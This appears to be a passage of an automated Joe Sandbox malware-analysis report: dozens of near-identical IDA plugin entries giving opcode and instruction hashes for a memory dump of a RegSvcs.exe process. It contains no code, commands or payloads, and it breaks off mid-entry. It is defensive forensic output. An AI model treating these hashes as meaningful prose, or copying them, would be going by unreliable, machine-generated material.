                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4042fd3006e3e654d6be73287c800eb82a2787f69285497fb14beed3ffd9ee2a
                                                                        • Instruction ID: 9dbb8ba384e9cd0be750d1f2d69e5728b77bc63647bceb5e087507dc706282c9
                                                                        • Opcode Fuzzy Hash: 4042fd3006e3e654d6be73287c800eb82a2787f69285497fb14beed3ffd9ee2a
                                                                        • Instruction Fuzzy Hash: 131118B1E002099BCB00DFAAD581AAEBBF8FF58350F10406AA905E7351D674EA018BA4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction ID: 9039d473d3da5c86fa057c1cb02d32ab96b17c93dbd98b9113c648e437860a5a
                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction Fuzzy Hash: 2601FC726007459FEB22DBAAD840FA77BE9FFD6650F04441FEA468B660DE74E402C760
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23517fc7142b9521e45efe716c6a551393fa1a8ea415f7ba64cd3712da7cfc75
                                                                        • Instruction ID: 3e18248bb531cc2cd76359ec02d231f6c5ea93649446d1505f3e0d0ecb19142e
                                                                        • Opcode Fuzzy Hash: 23517fc7142b9521e45efe716c6a551393fa1a8ea415f7ba64cd3712da7cfc75
                                                                        • Instruction Fuzzy Hash: F811AD75A0020DEBCF05EF64C841EAE7BB9EB98384F00405AE9019B360D635AE11CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f173ab1ad76dbac68ecf7fb7973f7d9a389ef2e4e1fd6e54fe2d726dd074cea8
                                                                        • Instruction ID: ec9fa543ae3e232a400aa39ba844900daf7e012317a133f6046f50acc2f5e814
                                                                        • Opcode Fuzzy Hash: f173ab1ad76dbac68ecf7fb7973f7d9a389ef2e4e1fd6e54fe2d726dd074cea8
                                                                        • Instruction Fuzzy Hash: 77018472201515BBD711AB6ACD40E57BBACFBE8664700056FB50597671DB74EC01C6A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80df40e2e8e95a6e5d8202d814030fcd0ef2dc28eb0c075c3cf9f291a4e371ae
                                                                        • Instruction ID: 882215306392526d783577f65a283a4439f6ea6aba5927f763c1c0db60506fc3
                                                                        • Opcode Fuzzy Hash: 80df40e2e8e95a6e5d8202d814030fcd0ef2dc28eb0c075c3cf9f291a4e371ae
                                                                        • Instruction Fuzzy Hash: ED0140323142059BDB20DF6AD4C89A7FBACFF5D620F12411BE95887290D7309911C7E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f808e6941ecef5e8d339af1a7fe4f9723d1452ba90c9042ebae1720bb3d215f
                                                                        • Instruction ID: f67f7444118259778fd486200920197eb1b4005d3e13601eaec892de856136ec
                                                                        • Opcode Fuzzy Hash: 4f808e6941ecef5e8d339af1a7fe4f9723d1452ba90c9042ebae1720bb3d215f
                                                                        • Instruction Fuzzy Hash: 15116D75A0120DEBDF15EF69C884EAE7BBAFB68344F01406AFD0197360DA35E911CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1b493ff7aa0b9367a015a9d8b91a29cfe97253646f50de1a6581ed0344ded603
                                                                        • Instruction ID: 408d2dcf8594664ca95e784eb91efa133454e4d45ca077c6d28266b2172eb23a
                                                                        • Opcode Fuzzy Hash: 1b493ff7aa0b9367a015a9d8b91a29cfe97253646f50de1a6581ed0344ded603
                                                                        • Instruction Fuzzy Hash: 5B1179B16083089FC700DF6AD44195BBBF8EFA8310F00451FB998D73A0E630E901CB92
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 139c9cf5755c9c5b4af42a321540b6f191b750ff21b5a2f553fc6aab4ce8be36
                                                                        • Instruction ID: 143883ce134dd587df5562694a55f118077d52f20c3eacad25ab71e51ef813f3
                                                                        • Opcode Fuzzy Hash: 139c9cf5755c9c5b4af42a321540b6f191b750ff21b5a2f553fc6aab4ce8be36
                                                                        • Instruction Fuzzy Hash: 4B1127B16183099FC710DF6AD441A5BBBE8AFA9750F40851FB958D73A4E630E9018B92
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                        • Instruction ID: 90654c35cf8f7a85ad2fc8d39e2d8862a9bb9947a2ac8eb608d7a5bda068b7d9
                                                                        • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                        • Instruction Fuzzy Hash: 3201D832600A019FE721DA99D844F57B7E6FBD5210F08441EE7428B760DEB0F845C764
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                        • Instruction ID: 6037187abc1b6cbfcf17762be92e85beac3d9473566f9025e4da49e68b1c3421
                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                        • Instruction Fuzzy Hash: 900171712015809FE322861DC948F67BBE8EB98754F0904A7F905DB7B2D638DC41CA21
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fecf05cdb89f0e8148820cbdbda4351cb997b4cdae820890e3d328eec41f7ccf
                                                                        • Instruction ID: 2711f87dec55cc952f08d33d5829f44ac57f785a2c984725295d8f699eccfb3b
                                                                        • Opcode Fuzzy Hash: fecf05cdb89f0e8148820cbdbda4351cb997b4cdae820890e3d328eec41f7ccf
                                                                        • Instruction Fuzzy Hash: A401D4317005069BD715EB6AD8109EB7BA8FFA0620F4A402B9901DB768DE30D801C390
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2733ec6ddacafecc3a30d2a6e9c11c9f871f5d3078fc79b2609e85771cba557
                                                                        • Instruction ID: fe0cf14d34930d47ff94d9dc53ccfc0f9b2a383274e128e078118202f48bbda3
                                                                        • Opcode Fuzzy Hash: d2733ec6ddacafecc3a30d2a6e9c11c9f871f5d3078fc79b2609e85771cba557
                                                                        • Instruction Fuzzy Hash: 34F0F933641A20B7C7319F578C40F477AA9EBD4AA0F14802AE605D7660C670ED41C6A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                        • Instruction ID: 08d66e2b9837261088499359d45c0bc2cc9e818e694734b4bc8b32f8ffae24e5
                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                        • Instruction Fuzzy Hash: F6F0C2F2601611ABE328CF8EDC40E57FBEEDBD5A90F088129A505CB320EA31DD04CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                        • Instruction ID: df9235d0aca1196f96331b1994e11e609a22402696a1c9702871e63e5f5ff051
                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                        • Instruction Fuzzy Hash: B8F0FC732846339BD7321B9A8CC0B6BA9959FE5A64F19003BE2099B668C9748D0356D0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                        • Instruction ID: c4f03f741cf276046e2254db56302f8aaab5386f2ddaa712fd0f0a02450ea179
                                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                        • Instruction Fuzzy Hash: E601D63120068A9BE722D65DC849B5ABF9CEF52750F09406BFE048B7B2E679C801C610
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5df2b8d1661519903bcf9debd2a760c4fb2b17ef632b5b6982e8b0ab7c4877d7
                                                                        • Instruction ID: 9c18423991a39ba9714ce5845be852d424a12cb6fd888a61e55000fa43b6ce68
                                                                        • Opcode Fuzzy Hash: 5df2b8d1661519903bcf9debd2a760c4fb2b17ef632b5b6982e8b0ab7c4877d7
                                                                        • Instruction Fuzzy Hash: AE018F71A002499BDB00EFA9D445AEEBBF8BF58314F15005EE500EB390D734EA02CB95
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                        • Instruction ID: 5c3fa22929a38a99e5d39ff92c45d0e47b93f0005b5840b5e7e31ecebc858f69
                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                        • Instruction Fuzzy Hash: 67F01D7220001DBFEF019F95DD80DAF7B7EEB692A8B154129FA1192170D635DD21ABA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 10948ff9454a0751950f29273c33d31b897f7ab076357cdafc699ae7791c2e26
                                                                        • Instruction ID: 2104eda7760a6ce6332734042c94deb0661b0b1ef869dda92a3eae0be072f5db
                                                                        • Opcode Fuzzy Hash: 10948ff9454a0751950f29273c33d31b897f7ab076357cdafc699ae7791c2e26
                                                                        • Instruction Fuzzy Hash: DB019A36110209ABCF129F84DC40EDE3F66FB5C754F068116FE186A220C332D971EB81
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c91603ce3d13aa75ccfb06b55f3c6b713b4522b92efb872d63ffadac9bb5235c
                                                                        • Instruction ID: accfe712f35a2d60fcc1981b143c1ec98a0280cf6d6031ed4d47c4c7b2c377ea
                                                                        • Opcode Fuzzy Hash: c91603ce3d13aa75ccfb06b55f3c6b713b4522b92efb872d63ffadac9bb5235c
                                                                        • Instruction Fuzzy Hash: 87F024712C42419BF310962A8C81F233296EBD0664F65802FEB098F3E5EA70DC058BA4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 546770970305d316d2c5a98994e9158fda362db2cdfc0e12f3ba9857f3860844
                                                                        • Instruction ID: e3bc83f37d788dd39f9ddd4fe72083ec05449a7fb646dc37efaf0fd234269773
                                                                        • Opcode Fuzzy Hash: 546770970305d316d2c5a98994e9158fda362db2cdfc0e12f3ba9857f3860844
                                                                        • Instruction Fuzzy Hash: B90181702406859BF7729B3CDD58B263BA8BB55B48F9A0596BA01CB6F6D778D4028210
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                        • Instruction ID: 360faa03e27e653314ae2b38e21ad26c98f4bcc64372fbbc47ac3961dff18f98
                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                        • Instruction Fuzzy Hash: BDF0E93934191347EBB5AA2F8930B2FAA559FE0D11B0D062F9501CB7B0DF30DC118790
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                        • Instruction ID: b2b381291a52fb81bdafbf27d5c2c379af64babac74e51d339aee54ce2da17a3
                                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                        • Instruction Fuzzy Hash: DCF030336115119BD3219A4EC880F17B768AFE5A60F9B006EA614AB270C674EC028790
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6dfb086eeb4f2e26e50c403075006bf927c6e3f599b981d8d9c52926d4eced7
                                                                        • Instruction ID: 8f84c9cd6cfe85bda55c965cb79b6beed8c7592e0d5c22787e0d5d9d2eeb7bbc
                                                                        • Opcode Fuzzy Hash: b6dfb086eeb4f2e26e50c403075006bf927c6e3f599b981d8d9c52926d4eced7
                                                                        • Instruction Fuzzy Hash: 5FF0AF706093449FC310EF29C445A1BB7E4FFA8714F80465FB898DB3A4E634E901C796
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                        • Instruction ID: fcfbae9f477dfc861ab32d77cf16c3143b5537c7d6ae20f332e217f2157af8b7
                                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                        • Instruction Fuzzy Hash: FAF0B472610204AFE714DF26CC01F56B6E9EFA8350F148079A945D7275FAB0ED01C654
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c71606b82f3d84facf3452a8751537b681c0ba7aa9994f3302cc55492a930439
                                                                        • Instruction ID: d5b873d833b65b7fce2b1d632e71d345a4f6060fec79dbfafe90c3a7cd040118
                                                                        • Opcode Fuzzy Hash: c71606b82f3d84facf3452a8751537b681c0ba7aa9994f3302cc55492a930439
                                                                        • Instruction Fuzzy Hash: 57F0C270A0024DDFDB04EF69C555A9EBBB8FF28300F00805AB815EB395DA38EA05CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 77203fce325103816c6c2cafb14225e3345bb75d42dd0deaf1d80e7eea3e3a64
                                                                        • Instruction ID: 0b60c361f24f689bca303fef730f60ccba6405253cc2fc5a1d78f9460ea6b1a8
                                                                        • Opcode Fuzzy Hash: 77203fce325103816c6c2cafb14225e3345bb75d42dd0deaf1d80e7eea3e3a64
                                                                        • Instruction Fuzzy Hash: F9F0F0399222F18EE7228B1CC004B23BFC4DB00770F8D586BC94987232C7B0D8C0C601
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a2b2c6c0f96234f25602c470e6940f38152a6cbe04f585d33c468bfb264f1fae
                                                                        • Instruction ID: cfe706a521492e392e9b2b88c333810f424ee6a4db5da40b67b9a0b8651a787a
                                                                        • Opcode Fuzzy Hash: a2b2c6c0f96234f25602c470e6940f38152a6cbe04f585d33c468bfb264f1fae
                                                                        • Instruction Fuzzy Hash: 24F0A76651568107DF335B2C74683D2BBA5AB52510F1B148FE4B15F329C6F5C887D324
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df738d4e4a95a363d4e862cd31967689b8f714386b23a52654b6e0c08236e31c
                                                                        • Instruction ID: 759046baafe181cff7d9e0a7c3a78885d0ad5e0ffc69e65ef820716c050a1e3a
                                                                        • Opcode Fuzzy Hash: df738d4e4a95a363d4e862cd31967689b8f714386b23a52654b6e0c08236e31c
                                                                        • Instruction Fuzzy Hash: CBF0BE755117519FE3A29A1CC188B527BDC9B44AA4F09942BDD0A87633C670EA82CAA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction ID: cf3ccda5eff8d1b3102c9e1b1e4ba96b1ebdba59ab2e316af1ef1a7efe48945b
                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction Fuzzy Hash: 50E092723006012BE7119E5A8C80F47776E9FE6B14F04007EB5045E261C9F2DD0982A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction ID: a99a33496c4698ced0f7d23b220ab6c51c0b913f91b5a8a3d9c88d6a212b1bb3
                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction Fuzzy Hash: 85F030B21042049FE321CF0AD984FA2B7F8EB55364F46C02AE6099B671D379EC40CBB4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction ID: dae9d996976502f7f915792b7645e0ebd19304df3c77fd56064d4c717a3c4b5f
                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction Fuzzy Hash: AEF0E57A2043559FEB16CF1AD050AE5BBE4FB95350F0000AAF8428B321D731E9C2CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                        • Instruction ID: c731f38cfe384ed3c9f84a9b3091553d276c309a4e34f255047003c158d464e4
                                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                        • Instruction Fuzzy Hash: EFE0D832244145ABD3E15A598800B6777A5DBE47A0F19042BEA088F272FB70DCC1C7E8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction ID: 4edd8d36e7d749cc8e2ecc1ea7c6d24ab9e18b8961d3bffc087b6b14b9a4a3a7
                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction Fuzzy Hash: 52E0D832601110BBDB6197598D01F9B7EACDFA4EA0F05405AB600DB1A0E530DE00C690
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7be1e7eb52e4d65b1b50021bdf944fdf09b8da8cce6e431d1da6058445ae3c19
                                                                        • Instruction ID: bbfe94d9e1db623be3a5c66acf6e8d446d0f26865b3c297866e58d1e2266ece6
                                                                        • Opcode Fuzzy Hash: 7be1e7eb52e4d65b1b50021bdf944fdf09b8da8cce6e431d1da6058445ae3c19
                                                                        • Instruction Fuzzy Hash: 71E09232100554ABC322BF2ADD01F8A779AEBB4764F01451AF116571A0CA74AD50C794
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction ID: 4a267e5c9226fff82a2563f0e263f11aa89bdb5353d881c4842bbc01db057b27
